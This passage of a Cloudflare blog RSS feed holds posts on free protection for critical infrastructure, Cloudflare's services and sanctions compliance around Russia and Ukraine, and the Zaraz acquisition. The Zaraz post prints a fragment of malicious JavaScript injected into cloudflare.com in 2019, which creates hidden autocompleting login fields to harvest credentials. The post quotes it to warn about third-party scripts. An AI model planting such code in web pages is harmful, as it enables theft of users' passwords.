            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4qsBquy4mvUEGdVzPymHB2/a2baa8bf14858b724e73e3f9ef0efd8d/image2-3.png" />
            
            </figure><p>Cloudflare, CrowdStrike, and Ping Identity are three of the leading Zero Trust security companies securing each of these components. <a href="https://www.cloudflare.com/products/zero-trust/">Cloudflare's Zero Trust network security</a> offers a broad set of services that organizations can easily <a href="https://www.cloudflare.com/learning/access-management/how-to-implement-zero-trust/">implement</a> to ensure their connections are protected no matter where users access the network. CrowdStrike provides a broad set of end point security services to ensure that laptops, phones, and servers are not compromised. And Ping Identity provides identity solutions, including multi-factor authentication, that are foundational to any organization's <a href="https://www.cloudflare.com/cybersecurity-risk-management/">posture</a>.</p><p>Each of us is great at what we do on our own. Together, we provide <a href="https://www.cloudflare.com/zero-trust/solutions/">an integrated solution</a> that is unrivaled and proven to stand up to even the most sophisticated nation state cyber attacks.</p><p>And this is what we think is required, because the current threat is significantly higher than what we have seen since any of our companies was founded. We all built our companies relying on the nation’s infrastructure, and we believe it is incumbent on us to provide our technology in order to protect that <a href="https://www.cloudflare.com/the-net/government/critical-infrastructure/">infrastructure</a> when it is threatened. For this period of heightened risk, we are all providing our services at no cost to organizations in these most vulnerable sectors.</p><p>We've also worked together to ensure our products function in harmony and are easy to implement. We don't want short-staffed IT teams, long requisition processes, or limited budgets to stand in the way of getting the protection that's needed in place immediately. We've taken a cue from hospitals to triage the risks through a recommended list showing organizations that may be short of IT staff how they can proceed: suggesting what they should prioritize over the next day, over the next week, and over the next month.</p><p>You can download the recommended security triage program <a href="https://criticalinfrastructuredefense.org/files/Critical_Infrastructure_Defense_Project_Guide.pdf">here</a>. We know that not every organization will be able to implement every recommendation. But every step you get through on the list will help your organization be incrementally better prepared for whatever is to come.</p><p>Our teams are also committed to working directly with organizations in these sectors to make onboarding as quick and painless as possible. We will onboard customers under this project with the same level of service as if they were our largest paying customers. We believe it is our duty to help ensure that the nation’s critical infrastructure remains online and available through this challenging time.</p><p>We anticipate that, based on what we learn over the days ahead, the Critical Infrastructure Defense Project may expand to additional sectors and countries. We hope the predictions of retaliatory cyberattacks don't come true. But, if they do, we know our solutions can mitigate the risk, and we stand ready to fully deploy them to protect our most critical infrastructure.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5saVolAt0sSiUthAF4PvHf/1600e5fa8a5f30983f3ff9c634e497f1/image1-3.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">1U4xY4VOyEDrY5H3rZ6roL</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Steps we've taken around Cloudflare's services in Ukraine, Belarus, and Russia]]></title>
            <link>https://blog.cloudflare.com/steps-taken-around-cloudflares-services-in-ukraine-belarus-and-russia/</link>
            <pubDate>Mon, 07 Mar 2022 05:03:59 GMT</pubDate>
            <description><![CDATA[ At Cloudflare, we watched in horror as Russian invaded Ukraine. As of war looked more likely, we monitored the situation, with the goal of keeping our employees, our customers, and our network safe. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, we've watched in horror the Russian invasion of Ukraine. As the possibility of war looked more likely, we began to carefully monitor the situation on the ground, with the goal of keeping our employees, our customers, and our network safe.</p>
    <div>
      <h3>Helping protect Ukraine against cyberattacks</h3>
      <a href="#helping-protect-ukraine-against-cyberattacks">
        
      </a>
    </div>
    <p>Attacks against the Internet in Ukraine <a href="/internet-traffic-patterns-in-ukraine-since-february-21-2022/">began</a> even before the start of the invasion. Those attacks—and the steady stream of DDoS attacks we’ve seen in the days since—prompted us to extend our services to Ukrainian government and telecom organizations at no cost in order to ensure they can continue to operate and deliver critical information to their citizens as well as to the rest of the world about what is happening to them.</p><p>Going beyond that, under <a href="https://www.cloudflare.com/galileo/">Project Galileo</a>, we are expediting onboarding of any Ukrainian entities for our full suite of protections. We are currently assisting more than sixty organizations in Ukraine and the region—with about 25% of those organizations coming aboard during the current crisis. Many of the new organizations are groups coming together to assist refugees, share vital information, or members of the Ukrainian diaspora in nearby countries looking to organize and help. Any Ukrainian organizations that are facing attack can apply for free protection under Project Galileo by visiting <a href="https://www.cloudflare.com/galileo">www.cloudflare.com/galileo</a>, and we will expedite their review and approval.</p>
    <div>
      <h3>Securing our customers’ data during the conflict</h3>
      <a href="#securing-our-customers-data-during-the-conflict">
        
      </a>
    </div>
    <p>In order to preserve the integrity of customer data, we moved customer encryption key material out of our data centers in Ukraine, Russia, and Belarus. Our services continued to operate in the regions using our Keyless SSL technology, which allows encryption sessions to be terminated in a secure data center away from where there may be a risk of compromise.</p><p>If any of our facilities or servers in Ukraine, Belarus, or Russia lose power or connectivity to the Internet, we have configured them to brick themselves. All data on disk is encrypted with keys that are not stored on site. Bricked machines will not be able to be booted unless a secure, machine-specific key that is not stored on site is entered.</p>
    <div>
      <h3>Monitoring Internet availability in Ukraine</h3>
      <a href="#monitoring-internet-availability-in-ukraine">
        
      </a>
    </div>
    <p>Our team continues to monitor Internet patterns across Ukraine. While usage across the country has declined over the last 10 days, we are thankful that in most locations the Internet is still accessible.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/656Iuyuwp8AZFFVokbz8vl/8400217c1e1a18728df470b137dc7145/image1-2.png" />
            
            </figure><p>We are taking steps to ensure that, as long as there is connectivity out of the country, our services will continue to operate.</p>
    <div>
      <h3>Staying ahead of the threat globally</h3>
      <a href="#staying-ahead-of-the-threat-globally">
        
      </a>
    </div>
    <p>Cyber threats to Ukrainian customers and telecoms is only part of the broader story of potential cyberattacks. Governments around the world have emphasized that organizations must be prepared to respond to disruptive cyber activity. The US Cybersecurity and Infrastructure Security Agency (CISA), for example, <a href="https://www.cisa.gov/shields-up">has recommended</a> that all organizations—large and small—go “Shields Up” to protect themselves from attack. The UK’s National Cyber Security Centre has <a href="https://www.ncsc.gov.uk/news/organisations-urged-to-bolster-defences">encouraged</a> organizations to improve their <a href="https://www.cloudflare.com/learning/security/what-is-cyber-resilience/">cyber resilience</a>.</p><p>This is where careful monitoring of the attacks in Ukraine is so important. It doesn’t just help our customers in Ukraine — it helps us learn and improve our products so that we can protect all of our customers globally. When wiper malware was identified in Ukraine, for example, we adapted our <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> products to make sure our customers were protected.</p><p>We’ve long believed that everyone should have access to <a href="https://www.cloudflare.com/products/zero-trust/threat-defense/">cybersecurity tools</a> to protect themselves, regardless of their size or resources. But during this time of heightened threat, access to <a href="https://www.cloudflare.com/learning/security/what-is-cyber-security/">cybersecurity services</a> is particularly critical. We have a number of free services available to protect you online — and <a href="/shields-up-free-cloudflare-services-to-improve-your-cyber-readiness/">we encourage you to take advantage of them</a>.</p>
    <div>
      <h3>Providing services in Russia</h3>
      <a href="#providing-services-in-russia">
        
      </a>
    </div>
    <p>Since the invasion, providing any services in Russia is understandably fraught. Governments have been united in imposing a stream of new sanctions and there have even been some calls to disconnect Russia from the global Internet. As discussed by <a href="https://www.internetsociety.org/blog/2022/03/why-the-world-must-resist-calls-to-undermine-the-internet/">ICANN</a>, the <a href="https://www.icann.org/en/system/files/correspondence/marby-to-fedorov-02mar22-en.pdf">Internet Society</a>, the <a href="https://www.eff.org/deeplinks/2022/03/wartime-bad-time-mess-internet">Electronic Frontier Foundation</a>, and <a href="https://www.techdirt.com/2022/03/02/very-very-bad-ideas-ukraine-asks-icann-to-disconnect-russia-from-the-internet/">Techdirt</a>, among others, the consequences of such a shutdown would be profound.</p><p>The scope of new sanctions issued in the last few weeks have been unprecedented in their reach, frequency, and the number of different governments involved. Governments have issued sweeping new sanctions designed to impose severe costs against those who supported the invasion of Ukraine, including government entities and officials in Russia and Belarus. Sanctions have been imposed against Russia’s top financial institutions, including Russia’s two largest banks, fundamentally altering the ability of Russians to access capital. The entire break away territories of Donetsk and Luhansk, including all of the residents of those regions, are subject to comprehensive sanctions. We’ve seen sanctions on state-owned enterprises, elite Russian families, and the leaders of intelligence-directed disinformation outlets.</p><p>These sanctions are intended to make sure that those who supported the invasion are held to account. And Cloudflare has taken action to comply. Over the past several years, Cloudflare has developed a robust and comprehensive sanctions compliance program that allows us to track and take immediate steps to comply with new sanctions regulations as they are implemented. In addition to an internal compliance team and outside counsel, we employ third party tools to flag potential matches or partial ownership by sanctioned parties, and we review reports from third-parties about potential connections. We have also worked with government experts inside and outside the United States to identify when there is a connection between a sanctioned entity and a Cloudflare account.</p><p>Over the past week, our team has ensured that we are complying with these new sanctions as they are announced. We have closed off paid access to our network and systems in the new comprehensively-sanctioned regions. And we have terminated any customers we have identified as tied to sanctions, including those related to Russian financial institutions, Russian influence campaigns, and the Russian-affiliated Donetsk and Luhansk governments. We’ve never had any offices or employees located in Russia, and we have taken steps to prevent the company from making any payments for things like taxes or fees to the Russian government. We expect additional sanctions are likely to come from governments as they determine additional steps are appropriate, and we will continue to move quickly to comply with those requirements as they are announced.</p><p>Beyond this, we have received several calls to terminate all of Cloudflare's services inside Russia. We have carefully considered these requests and discussed them with government and civil society experts. Our conclusion, in consultation with those experts, is that Russia needs more Internet access, not less.</p><p>As the conflict has continued, we’ve seen a dramatic increase in requests from Russian networks to worldwide media, reflecting a desire by ordinary Russian citizens to see world news beyond that provided within Russia.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4MSNhXX3NDNjHSfJlBr0TT/4215bc0f344fe3ba2523ca59e4a309ed/image2-2.png" />
            
            </figure><p>We’ve also seen an increase in Russian blocking and throttling efforts, combined with Russian efforts to control the content of the media operating inside Russia with a new <a href="https://www.theverge.com/2022/3/4/22961472/russia-fake-news-law-military-ukraine-invasion-casualties-jail-time">“fake news” law.</a></p><p>The Russian government itself, over the last several years, has threatened repeatedly to block certain Cloudflare <a href="https://www.bleepingcomputer.com/news/legal/russian-internet-watchdog-announces-ban-of-six-more-vpn-products/">services</a> and customers. Indiscriminately terminating service would do little to harm the Russian government, but would both limit access to information outside the country, and make significantly more vulnerable those who have used us to shield themselves as they have criticized the government.</p><p>In fact, we believe the Russian government would celebrate us shutting down Cloudflare's services in Russia. We absolutely appreciate the spirit of many Ukrainians making requests across the tech sector for companies to terminate services in Russia. However, when what Cloudflare is fundamentally providing is a more open, private, and secure Internet, we believe that shutting down Cloudflare's services entirely in Russia would be a mistake.</p><p>Our thoughts are with the people of Ukraine and the entire team at Cloudflare prays for a peaceful resolution as soon as possible.</p> ]]></content:encoded>
            <category><![CDATA[Ukraine]]></category>
            <category><![CDATA[Russia]]></category>
            <category><![CDATA[Internet Traffic]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">3OsCwQ7RuA5Fq6cNP5D4Qn</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Why Cloudflare Bought Zaraz]]></title>
            <link>https://blog.cloudflare.com/why-cloudflare-bought-zaraz/</link>
            <pubDate>Wed, 08 Dec 2021 14:02:00 GMT</pubDate>
            <description><![CDATA[ Today we're excited to announce that Cloudflare has acquired Zaraz. The Zaraz value proposition aligns with Cloudflare's mission. They aim to make the web more secure, more reliable, and faster. And they built their solution on Cloudflare Workers. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Today we're excited to announce that Cloudflare has acquired Zaraz. The Zaraz value proposition aligns with Cloudflare's mission. They aim to make the web more secure, more reliable, and faster. And they built their solution on Cloudflare Workers. In other words, it was a no-brainer that we invite them to join our team.</p>
    <div>
      <h3>Be Careful Who Takes Out the Trash</h3>
      <a href="#be-careful-who-takes-out-the-trash">
        
      </a>
    </div>
    <p>To understand Zaraz's value proposition, you need to understand one of the biggest risks to most websites that people aren't paying enough attention to. And, to understand that, let me use an analogy.</p><p>Imagine you run a business. Imagine that business is, I don't know, a pharmacy. You have employees. They have a process and way they do things. They're under contract, and you conduct background checks before you hire them. They do their jobs well and you trust them. One day, however, you realize that no one is emptying the trash. So you ask your team to find someone to empty the trash regularly.</p><p>Your team is busy and no one has the time to add this to their regular duties. But one plucky employee has an idea. He goes out on the street and hails down a relative stranger. "Hey," your employee says to the stranger. "I've seen you walking by this way every day. Would you mind stopping in and taking out the trash when you do?"</p><p>"Uh", the stranger says. "Sure?!"</p><p>"Great," your employee says. "Here's a badge that will let you into the building. The trash is behind the secure area of the pharmacy, but, don't worry, just use the badge, and you can get back there. You look trustworthy. This will work out great!!"</p><p>And for a while it does. The stranger swings by every day. Takes out the trash. Behaves exactly as hoped. And no one thinks much about the trash again.</p><p>But one day you walk in, and the pharmacy has been robbed. Drugs stolen, patient records missing. Logs indicate that it was the stranger's badge that had been used to access the pharmacy. You track down the stranger, and he says "Hey, that sucks, but it wasn't me". I handed off that trash responsibility to someone else long ago when I stopped walking past the pharmacy every day."</p><p>And you never track down the person who used the privileged access to violate your trust.</p>
    <div>
      <h3>The Keys to the Kingdom</h3>
      <a href="#the-keys-to-the-kingdom">
        
      </a>
    </div>
    <p>Now, of course, this is crazy. No one would go pick a random stranger off the street and give them access to their physical store. And yet, in the virtual world, a version of this happens all the time.</p><p>Every day, front end developers, marketers, and even security teams embed third-party scripts directly on their web pages. These scripts perform basic tasks — the metaphorical equivalent of taking out the trash. When performing correctly, they can be valuable at bringing advanced functionality to sites, helping track marketing conversions, providing analytics, or stopping fraud. But, if they ever go bad, they can cause significant problems and even steal data.</p><p>At the most mundane, poorly configured scripts can slow down the rendering pages. While there are ways to make scripts non-blocking, the unfortunate reality is that their developers don't always follow the best practices. Often when we see slow websites, the biggest cause of slowness is all the third-party scripts that have been embedded.</p><p>But it can be worse. Much worse. At Cloudflare, we've seen this first hand. Back in 2019 a hacker compromised a third-party service that Cloudflare used and modified the third-party JavaScript that was loaded into a page on cloudflare.com. Their aim was to steal login cookies, usernames and passwords. They went so far as to automatically create username and password fields that would autocomplete.</p><p>Here’s a snippet of the actual code injected:</p>
            <pre><code>        var cf_form = document.createElement("form");
        cf_form.style.display = "none";
        document.body.appendChild(cf_form);
        var cf_email = document.createElement("input");
        cf_email.setAttribute("type", "text");
        cf_email.setAttribute("name", "email");
        cf_email.setAttribute("autocomplete", "username");
        cf_email.setAttribute("id", "_email_");
        cf_email.style.display = "none";
        cf_form.appendChild(cf_email);
        var cf_password = document.createElement("input");
        cf_password.setAttribute("type", "password");
        cf_password.setAttribute("name", "password");
        cf_password.setAttribute("autocomplete", "current-password");
        cf_password.setAttribute("id", "_password_");
        cf_password.style.display = "none";
        cf_form.appendChild(cf_password);</code></pre>
            <p>Luckily, this attack caused minimal damage because it was caught very quickly by the team, but it highlights the very real danger of third-party JavaScript. Why should code designed to count clicks even be allowed to create a password field?</p><p>Put simply, third-party JavaScript is a security nightmare for the web. What looks like a simple one-line change (“just add this JavaScript to get free page view tracking!”) opens a door to malicious code that you simply don’t control.</p><p>And worse is that third-party JavaScript can and does load other JavaScript from other unknown parties. Even if you trust the company whose code you’ve chosen to embed, you probably don’t trust (or even know about!) what they choose to include.</p><p>And even worse these scripts can change any time. Security threats can come and go. The attacker who went after Cloudflare compromised the third-party and modified their service to only attack Cloudflare and included anti-debugging features to try to stop developers spotting the hack. If you're a <a href="https://www.cloudflare.com/cio/">CIO</a> and this doesn't freak you out already, ask your web development team how many third-party scripts are on your websites. Do you trust them all?</p><p>The practice of adding third-party scripts to handle simple tasks is the literal equivalent of pulling a random stranger off the street, giving them physical access to your office, and asking them to stop by once a day to empty the trash. It's completely crazy in the physical world, and yet it's common practice in web development.</p>
    <div>
      <h3>Sandboxing the Strangers</h3>
      <a href="#sandboxing-the-strangers">
        
      </a>
    </div>
    <p>At Cloudflare, our solution was draconian. We ordered that all third-party scripts be stripped from our websites. Different teams at Cloudflare were concerned. Especially our marketing team, who used these scripts to assess whether the campaigns they were running were successful. But we made the decision that it was more important to protect the integrity of our service than to have visibility into things like marketing campaigns.</p><p>It was around this time that we met the team behind Zaraz. They argued there didn't need to be such a drastic choice. What if, instead, you could strictly control what the scripts that you insert on your page did. Make sure if ever they were compromised they wouldn't have access to anything they weren't authorized to see. Ensure that if they failed or were slow they wouldn't keep a page from rendering.</p><p>We've spent the last half year testing Zaraz, and it's magical. It gives you the best of the flexible, extensible web while ensuring that CIOs and <a href="https://www.cloudflare.com/ciso/">CISOs</a> can sleep well at night knowing that even if a third-party script provider is compromised, it won't result in a security incident.</p><p>To put a fine point on it, had Cloudflare been running Zaraz then the threat from the compromised script we saw in 2019 would have been completely and automatically eliminated. There’s no way for the attacker to create those username and password fields, no access to cookies that are stored in the user’s browser. The attack surface would have been completely removed.</p><p>We've published two other posts today outlining how Zaraz works as well as examples of how companies are using it to ensure their web presence is secure, reliable, and fast. We are making Zaraz available to our Enterprise customers immediately, and all other customers can access a free beta version on their <a href="https://dash.cloudflare.com/?to=/:account/:zone/zaraz">dashboard</a> starting today.</p><p>If you're a third-party script developer, be on notice that if you're not properly securing your scripts, then as Zaraz rolls out across more of the web your scripts will stop working. Today, Cloudflare sits in front of nearly 20% of all websites and, before long, we expect Zaraz's technology will help protect all of them. We want to make sure all scripts running on our customers' sites meet modern security, reliability, and performance standards. If you need help getting there, please reach out, and we’ll be standing ready to help: <a>zaraz@cloudflare.com</a>.</p><p>In the meantime, we encourage you to read about how the Zaraz technology works and how customers like Instacart are using it to build a better web presence.</p><p>It's terrific to have Zaraz on board, furthering Cloudflare's mission to help build a better Internet. Welcome to the team. And in that vein: we'd like to welcome you to Zaraz! We're excited for you to get your hands on this piece of technology that makes the web better.</p> ]]></content:encoded>
            <category><![CDATA[CIO Week]]></category>
            <guid isPermaLink="false">1O9xC0yLccgWJd7p6EJEtU</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
    </channel>
</rss>